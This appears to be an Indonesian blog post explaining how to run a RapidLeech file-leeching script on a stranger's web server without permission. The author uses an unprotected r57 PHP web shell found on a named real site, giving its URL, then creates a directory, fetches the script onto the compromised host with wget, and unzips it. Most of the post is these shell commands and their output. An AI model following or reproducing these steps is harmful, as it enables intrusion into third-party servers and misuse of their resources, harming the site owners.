Best Author
sangdedi

743,621
octa

486,319
fitrotinnikm

456,615
idjah

445,181
dwi

313,561
adit

310,130
resta-andara

275,261
benedict

261,583
rahadian

240,948
bara

228,942
nabilalalala

216,892
kurnitap_

154,132
kuswanto

140,247
suranto

100,765
admin

99,012
iwan

80,055
kupukupu

78,106

Bikin RapidLeech Ilegal..

daripada rebutan make rapidleech bikinan orang, mending bikin sendiri, kalau nggak pake hostingan gratis, ya numpang aja di web orang..
peralatan yang dibutuhkan :
- phpshell
- script rapidleech

kalau belum punya phpshell nya, cari via google aja..
hasil iseng hari ini, ga sengaja nemu r57 salah satu phpshell yang paling banyak di pake..
Quote:
http://www.blogme.ca/uploads/bangsat.php <~~ r57

masuk dulu ke phpshell nya.. untungnya nggak pake password nih..
Quote:
pwd :/home/blogme/public_html/uploads ( drwxrwxrwx )
folder harus rwxrwxrwx

r = read
w = write
x = execute
nah masih bisa nih..  lanjut.. coba bikin direktori.. ketik di “Run command”

Quote:
mkdir namadirektori

sample :
Quote:
mkdir ccpb

- Enter

Quote:
4522720 drwxr-xr-x 7 nobody nobody 4096 Nov 24 20:04 ccpb
Setelah Sukses, masuk ke direktori yang tadi kita buat..

di “Work directory” tambahin aja nama direktori yang tadi kita buat, karena saya bikin direktori ccpb, jadi ya saya ketik ccpb dibelakang /home/blogme/public_html/uploads/

sample :
Quote:
/home/blogme/public_html/uploads/ccpb
- Enter

Quote:
pwd :/home/blogme/public_html/uploads/ccpb ( drwxr-xr-x )
sekarang coba upload dulu script rapidleech na yang dah di compress pake zip..

liat di

:: Upload files on server ::

trus browse, klik upload atau pake wget

di Run command ketik
Quote:
wget http://site.com/rapidscript.zip

Kalau dah ke upload, baru deh di ekstract script rapidleech yang tadi kita upload

pake command
Quote:
unzip namafile.zip
sample :
Quote:
unzip rs.zip
http://www.blogme.ca/uploads/ccpb/

selamat mencoba… !!! :wink:

Penulis :
Telah menulis sebanyak 39 artikel
Mendapatkan 143 komentar
  Rating tulisan 5 dari 5

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>